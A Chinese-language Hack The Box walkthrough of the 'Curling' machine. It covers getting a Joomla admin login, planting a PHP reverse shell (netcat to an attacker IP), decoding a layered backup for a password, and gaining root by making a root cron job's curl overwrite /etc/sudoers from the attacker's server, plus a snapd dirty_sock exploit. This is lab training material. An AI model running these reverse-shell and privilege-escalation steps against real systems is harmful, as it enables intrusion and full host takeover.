hackthebox - curling (考点:信息搜集 joomla安全 xxd/bzip/gzip linux修改脚本提权 ubantu snap提权)

本文主要是介绍hackthebox - curling (考点:信息搜集 joomla安全 xxd/bzip/gzip linux修改脚本提权 ubantu snap提权),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1 扫描

22可能有ssh登录,80进web搜集信息

C:\root> nmap -A 10.10.10.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 22:47 EDT
Nmap scan report for 10.10.10.150
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
6646/tcp filtered unknown

2 web搜集信息

可以看到floris,可能这个就是用户
在这里插入图片描述
dirbuster扫到secret.txt,打开看是base码,拿去解密。
在这里插入图片描述

密码是Curling2018!

3 joomla拿shell

dirbuster还扫到登录页面10.10.10.150/administrator/登录,这个是joomla

有固定的的方法拿shell,从extension进入,在template那里,有俩模板,多个php文件,随便选一个,修改成自己的弹shell php代码
在这里插入图片描述

<?phpsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.43 1337 >/tmp/f');
?>

我选的beez3模板的error.php 改完后,找error.php的位置,既然是在模板里,目录应该是和模板相关的。最后点击10.10.10.150/templates/beez3/error.php这个。
收到
tty,靶机里装的是python3 python3 -c 'import pty; pty.spawn("/bin/bash")'

4 拿floris的shell

老套路 https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite 自动扫
可以看到有密码backup备份文件,当然高度可疑了
在这里插入图片描述
用nc传到本机
打开是数字hex,
在这里插入图片描述

用xxd解密。又发现是bzip文件,再解,又是gzip文件,就这样不断解,直到发现是tar。再tar解压缩就搞定了。拿到密码5d<wdCbdZu)|hChXll,直接su floris ,切换到floris

C:\root\htb\curling> xxd -r what > 666
C:\root\htb\curling> file 666
666: bzip2 compressed data, block size = 900k
C:\root\htb\curling> mv 666 666.bzip
C:\root\htb\curling> bzip2 -d 666.bzip 
bzip2: Can't guess original name for 666.bzip -- using 666.bzip.out
C:\root\htb\curling> file 666.bzip.out 
666.bzip.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size modulo 2^32 141C:\root\htb\curling> mv 666.bzip.out 666.gz
C:\root\htb\curling> gzip -d 666.gz 
C:\root\htb\curling> file 666 
666: bzip2 compressed data, block size = 900k
C:\root\htb\curling> mv 666 666.bzip
C:\root\htb\curling> bzip2 -d 666.bzip 
bzip2: Can't guess original name for 666.bzip -- using 666.bzip.out
C:\root\htb\curling> file 666.bzip.out 
666.bzip.out: POSIX tar archive (GNU)
C:\root\htb\curling> mv 666.bzip.out 666.tar
C:\root\htb\curling> tar xvf 666.tar 
password.txt
C:\root\htb\curling> cat password.txt 
5d<wdCbdZu)|hChXll
C:\root\htb\curling> 

5 利用靶机的curl文件提权

目录下有admin-area这个,打开看input和report,这个不就是curl的内容吗,curl靶机的localhost。然后显示在report里

floris@curling:~$ cd admin-area/
floris@curling:~/admin-area$ ls
input  report
floris@curling:~/admin-area$ cat input 
url = "http://127.0.0.1"
floris@curling:~/admin-area$ cat output
cat: output: No such file or directory
floris@curling:~/admin-area$ cat report 
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta charset="utf-8" /><base href="http://127.0.0.1/" /><meta name="description" content="best curling site on the planet!" /><meta name="generator" content="Joomla! - Open Source Content Management" /><title>Home</title><link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
。。。。。

我用ls -la查看这俩文件的权限,以及pspy看进程这里下载,
确认是root在执行的cronjob /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

这里就有了提权思路,如果我改一改input,让root在curl时,curl的是我的恶意文件(比如造一个假的/etc/sudoers,里面我sudo -l 的内容是all),并输出覆盖替换靶机的真文件/etc/sudoers,完成狸猫换太子。/etc/sudoers这是管理sudo -l的地方,sudo -l是让用户能以root身份执行一些文件。如果我把改成all,我可以sudo -l执行all,所有文件。那我就是root,就可以提权了。

在这里插入图片描述
在这里插入图片描述
我先在本机造恶意文件sudoers,让sudo -l时,可以以root身份执行all全部,这样其实就是root了


root    ALL=(ALL:ALL) ALL
floris  ALL=(ALL:ALL) ALL

打开我的http服务python -m SimpleHTTPServer 80,让靶机可以调用我的恶意文件sudoers

接着,靶机里input,我nano修改它。内容改为如下,也就是给出我的恶意文件地址,让靶机能调我的文件,
然后输出覆盖到靶机的管理sudo -l命令的地方/etc/sudoers

url = "http://10.10.14.43/sudoers"
output = "/etc/sudoers"

在这里插入图片描述
最后保存,因为是cronjob,隔段时间才会执行。我等我的python http 有了显示:GET。靶机已调用,我就知道覆盖已完成。可以sudo -i切换了。输入之前拿到的floris的密码5d<wdCbdZu)|hChXll 成功 root。因为我之前tty时设置了下屏幕,所以有些乱序和乱码。没影响。
在这里插入图片描述

在这里插入图片描述

6 利用snap ubantu版本提权

第二种方法,linpeas扫描时,发现是ubantu

在这里插入图片描述

ubantu版本提权漏洞挺多的,只要是ubantu就留意查看是否可以用版本提权。

这次用snap查看版本,搜漏洞。小于2.37 都可以

floris@curling:/tmp$ snap version
snap    2.32.8+18.04
snapd   2.32.8+18.04
series  16
ubuntu  18.04
kernel  4.15.0-22-generic
floris@curling:/tmp$ 

在这里插入图片描述

网址https://www.exploit-db.com/exploits/46362,kali本机里也有。

传送到靶机,python3执行。我虽然是dirty sock,但其实它就是root,sudo + 任何命令都是以root在执行。比如whoami,可见我已是root。拿下
在这里插入图片描述

这篇关于hackthebox - curling (考点:信息搜集 joomla安全 xxd/bzip/gzip linux修改脚本提权 ubantu snap提权)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/503162

相关文章

linux-基础知识3

打包和压缩 zip 安装zip软件包 yum -y install zip unzip 压缩打包命令: zip -q -r -d -u 压缩包文件名 目录和文件名列表 -q:不显示命令执行过程-r:递归处理,打包各级子目录和文件-u:把文件增加/替换到压缩包中-d:从压缩包中删除指定的文件 解压:unzip 压缩包名 打包文件 把压缩包从服务器下载到本地 把压缩包上传到服务器(zip

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

业务中14个需要进行A/B测试的时刻[信息图]

在本指南中,我们将全面了解有关 A/B测试 的所有内容。 我们将介绍不同类型的A/B测试,如何有效地规划和启动测试,如何评估测试是否成功,您应该关注哪些指标,多年来我们发现的常见错误等等。 什么是A/B测试? A/B测试(有时称为“分割测试”)是一种实验类型,其中您创建两种或多种内容变体——如登录页面、电子邮件或广告——并将它们显示给不同的受众群体,以查看哪一种效果最好。 本质上,A/B测

客户案例:安全海外中继助力知名家电企业化解海外通邮困境

1、客户背景 广东格兰仕集团有限公司(以下简称“格兰仕”),成立于1978年,是中国家电行业的领军企业之一。作为全球最大的微波炉生产基地,格兰仕拥有多项国际领先的家电制造技术,连续多年位列中国家电出口前列。格兰仕不仅注重业务的全球拓展,更重视业务流程的高效与顺畅,以确保在国际舞台上的竞争力。 2、需求痛点 随着格兰仕全球化战略的深入实施,其海外业务快速增长,电子邮件成为了关键的沟通工具。

安全管理体系化的智慧油站开源了。

AI视频监控平台简介 AI视频监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。摄像头管理模块用于多种终端设备、智能设备的接入及管理。平台支持包括摄像头等终端感知设备接入,为整个平台提

【北交大信息所AI-Max2】使用方法

BJTU信息所集群AI_MAX2使用方法 使用的前提是预约到相应的算力卡,拥有登录权限的账号密码,一般为导师组共用一个。 有浏览器、ssh工具就可以。 1.新建集群Terminal 浏览器登陆10.126.62.75 (如果是1集群把75改成66) 交互式开发 执行器选Terminal 密码随便设一个(需记住) 工作空间:私有数据、全部文件 加速器选GeForce_RTX_2080_Ti

Linux_kernel驱动开发11

一、改回nfs方式挂载根文件系统         在产品将要上线之前,需要制作不同类型格式的根文件系统         在产品研发阶段,我们还是需要使用nfs的方式挂载根文件系统         优点:可以直接在上位机中修改文件系统内容,延长EMMC的寿命         【1】重启上位机nfs服务         sudo service nfs-kernel-server resta

2024网安周今日开幕,亚信安全亮相30城

2024年国家网络安全宣传周今天在广州拉开帷幕。今年网安周继续以“网络安全为人民,网络安全靠人民”为主题。2024年国家网络安全宣传周涵盖了1场开幕式、1场高峰论坛、5个重要活动、15场分论坛/座谈会/闭门会、6个主题日活动和网络安全“六进”活动。亚信安全出席2024年国家网络安全宣传周开幕式和主论坛,并将通过线下宣讲、创意科普、成果展示等多种形式,让广大民众看得懂、记得住安全知识,同时还